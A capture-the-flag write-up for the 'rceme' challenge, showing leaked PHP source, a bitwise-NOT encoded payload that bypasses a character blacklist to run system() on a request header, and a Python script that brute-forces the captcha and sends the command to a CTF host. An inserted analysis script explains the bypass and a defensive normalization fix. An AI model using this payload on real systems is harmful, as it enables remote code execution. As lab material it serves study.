Problem: [极客大挑战 2020]rceme
Approach
- General solving approach
The site leaks `.index.php.swp`; downloading it gives the source. The `code` (captcha) value can be brute-forced from rockyou.txt before each request, and `cmd` requires a parameterless RCE.
```php
/**********************************
 *
 * author : Longlone
 * type   : Backup
 *
 **********************************/
<?php
error_reporting(0);
session_start();
if(!isset($_SESSION['code'])){
    $_SESSION['code'] = substr(md5(mt_rand().sha1(mt_rand)),0,5);
}
if(isset($_POST['cmd']) and isset($_POST['code'])){
    if(substr(md5($_POST['code']),0,5) !== $_SESSION['code']){
        die('<script>alert(\'Captcha error~\');history.back()</script>');
    }
    $_SESSION['code'] = substr(md5(mt_rand().sha1(mt_rand)),0,5);
    $code = $_POST['cmd'];
    if(strlen($code) > 70 or preg_match('/[A-Za-z0-9]|\'|"|`|\ |,|\.|-|\+|=|\/|\\|<|>|\$|\?|\^|&|\|/ixm',$code)){
        die('<script>alert(\'Longlone not like you~\');history.back()</script>');
    }else if(';' === preg_replace('/[^\s\(\)]+?\((?R)?\)/', '', $code)){
        @eval($code);
        die();
    }
}
?>
```
Use a tool to build a bitwise-NOT (`~`) encoded payload, so that `cmd` contains no letters or digits:

[~%8c%86%8c%8b%9a%92][!%FF]([~%91%9a%87%8b][!%FF]([~%98%9a%8b%9e%93%93%97%9a%9e%9b%9a%8d%8c][!%FF]()));
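To see why the filter above lets this payload through, and what a defender would have to do to catch it, here is an added analysis script (not part of the original write-up). It re-implements the challenge's two checks in Python as an approximation (a byte-level character blacklist, plus iterative stripping of innermost `name()` calls standing in for PCRE's `(?R)` recursion), then normalizes every `[~"..."][!"\xff"]` construct back to the string it evaluates to (`~` flips every bit; `!"\xff"` is `false`, i.e. index 0). The payload string is a copy of the one above; everything else is constructed for this example.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed copy of the write-up's payload in its percent-encoded form.
PAYLOAD = ('[~%8c%86%8c%8b%9a%92][!%FF]([~%91%9a%87%8b][!%FF]'
           '([~%98%9a%8b%9e%93%93%97%9a%9e%9b%9a%8d%8c][!%FF]()));')

# Approximation of the challenge's character blacklist, applied to raw bytes:
# letters, digits and the listed punctuation. Bytes >= 0x80 are not listed,
# which is exactly the gap the ~ encoding exploits.
BLACKLIST = re.compile(rb"[A-Za-z0-9]|'|\"|`| |,|\.|-|\+|=|/|\\|<|>|\$|\?|\^|&|\|")

# Stand-in for the recursive preg_replace: strip innermost name() calls until
# nothing changes; a pure chain of parameterless calls leaves only ';'.
CALL = re.compile(rb'[^\s()]+?\(\)')

# [~<bytes>][!\xff] -> the decoded string (bitwise NOT of every byte).
NOT_STR = re.compile(rb'\[~([^\]]+)\]\[!\xff\]')


def passes_filter(code: bytes) -> bool:
    """Mirror of the PHP gate: <= 70 bytes, no blacklisted byte, and nothing
    but nested parameterless calls followed by ';'."""
    if len(code) > 70 or BLACKLIST.search(code):
        return False
    stripped = code
    while True:
        new = CALL.sub(b'', stripped)
        if new == stripped:
            break
        stripped = new
    return stripped == b';'


def normalize(code: bytes) -> bytes:
    """Replace each [~...][!\xff] construct with the string it evaluates to,
    so a detection rule can match on the real function names."""
    return NOT_STR.sub(lambda m: bytes(b ^ 0xFF for b in m.group(1)), code)


def analyse(payload: str) -> dict:
    """Compare the filter's verdict on the raw bytes and on the normalized form."""
    raw = unquote_to_bytes(payload)
    decoded = normalize(raw)
    return {
        'raw_passes_filter': passes_filter(raw),
        'decoded': decoded.decode('ascii', 'replace'),
        'decoded_passes_filter': passes_filter(decoded),
    }


if __name__ == '__main__':
    for k, v in analyse(PAYLOAD).items():
        print(f'{k}: {v}')
```

The raw bytes pass both checks, while the normalized form is immediately rejected by the same blacklist: a byte-level deny-list is only as good as the encodings it normalizes first, and a rule that decodes `~` strings (or simply refuses non-ASCII bytes in `cmd`) closes this particular gap.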
EXP
- Exploit code
```python
import hashlib
import requests

s = requests.session()
data = open('rockyou.txt', 'r', encoding='latin-1').read()
url = 'http://node4.anna.nssctf.cn:28418/'

# Fetch the page; the 5-character target prefix is printed after '=='
r = s.get(url)
pos = r.text.find('==')
code = r.text[pos+2:pos+7]

# Find a rockyou word whose MD5 starts with that prefix
code_md5 = ''
for w in data.split('\n'):
    md = hashlib.md5(w.encode()).hexdigest()
    if md[:5] == code:
        code_md5 = w
        print(w)
        break

# Bitwise-NOT encoded payload (same session, so the captcha is still valid)
cmd = '[~%8C%86%8C%8B%9A%92][!%FF]([~%91%9A%87%8B][!%FF]([~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C][!%FF]()));'
raw_data = f'code={code_md5}&cmd={cmd}'
r = s.post(
    url=url,
    data=raw_data,
    allow_redirects=False,
    headers={
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'tac /flll1114gggggg',
    }
)
print('[*]', r.text)
```
Summary
- Summary of the concepts tested in this challenge

What tool is this?